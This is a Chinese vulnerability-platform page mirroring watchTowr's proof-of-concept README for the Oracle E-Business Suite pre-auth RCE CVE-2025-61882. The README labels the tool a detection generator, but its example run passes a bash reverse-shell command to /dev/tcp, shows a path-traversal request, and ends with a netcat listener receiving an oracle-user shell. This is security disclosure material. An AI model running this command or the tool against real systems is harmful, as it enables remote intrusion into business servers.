漏洞平台

POC详情： b49e209b082868cf50d1559c22ce55bf6ad4ec56

来源

https://github.com/watchtowrlabs/watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882

关联漏洞

标题： Oracle E-Business Suite 安全漏洞 (CVE-2025-61882)
描述：Oracle E-Business Suite是美国甲骨文（Oracle）公司的一套全面集成式的全球业务管理软件。该软件提供了客户关系管理、服务管理、财务管理等功能。 Oracle E-Business Suite 12.2.3版本至12.2.14版本存在安全漏洞，该漏洞源于未经验证的攻击者可通过HTTP网络访问进行攻击，可能导致组件接管。

介绍


# watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882

<img width="1000" height="627" alt="image" src="https://github.com/user-attachments/assets/46794126-0c0a-4cb6-b601-d7cc9a09f3ff" />


Detection Artifact Generator for Oracle E-Business Suite CVE-2025-61882

See our [blog post](https://labs.watchtowr.com/well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882well-well-well-its-another-day-oracle-e-business-suite-pre-auth-rce-chain-cve-2025-61882/) for technical details

# Detection in Action

```
python3 watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py --command 'bash -i >& /dev/tcp/192.168.1.10/4444 0>&1' --platform linux  --target http://192.168.1.22:8000 --lhost 192.168.1.10 --lport 80
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py

        (*) Oracle E-Business Suite Pre-Auth RCE Detection Artifact Generator

          - Sonny, Sina Kheirkhah (@SinSinology),  Jake Knott (@inkmoro) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-61882]

[*] Listening on 192.168.1.10:80 and serving payload...
[*] connecting to target to retrieve CSRF token...
[*] CSRF TOKEN: WLDW-GNFH-MB4K-76EA-JB48-VY3X-L30R-NZT0
[*] Cooking smuggle stub...
192.168.1.22 - - [06/Oct/2025 20:49:59] "GET /OA_HTML/help/../ieshostedsurvey.xsl HTTP/1.1" 200 -

```
Listener
```
ubuntu@watchTowr:~$ nc -lvvnp 4444
Listening on 0.0.0.0 4444
Connection received on 30290
bash: no job control in this shell
[oracle@apps EBS_domain]$ id
id
uid=54321(oracle) gid=54321(oinstall) groups=54321(oinstall),54322(dba),54323(oper),54324(backupdba),54325(dgdba),54326(kmdba),54330(racdba)
[oracle@apps EBS_domain]$
```

# Description

This script attempts to detect if Oracle E-Business Suite is vulnerable to CVE-2025-61882

# Affected Versions

Oracle E-Business Suite, versions 12.2.3-12.2.14

For more information visit [Oracle Security Alert Advisory - CVE-2025-61882](https://www.oracle.com/security-alerts/alert-cve-2025-61882.html)

# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/

- https://x.com/watchtowrcyber

文件快照


 [4.0K]  /data/pocs/b49e209b082868cf50d1559c22ce55bf6ad4ec56
├── [2.5K]  README.md
└── [5.5K]  watchTowr-vs-Oracle-E-Business-Suite-CVE-2025-61882.py

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。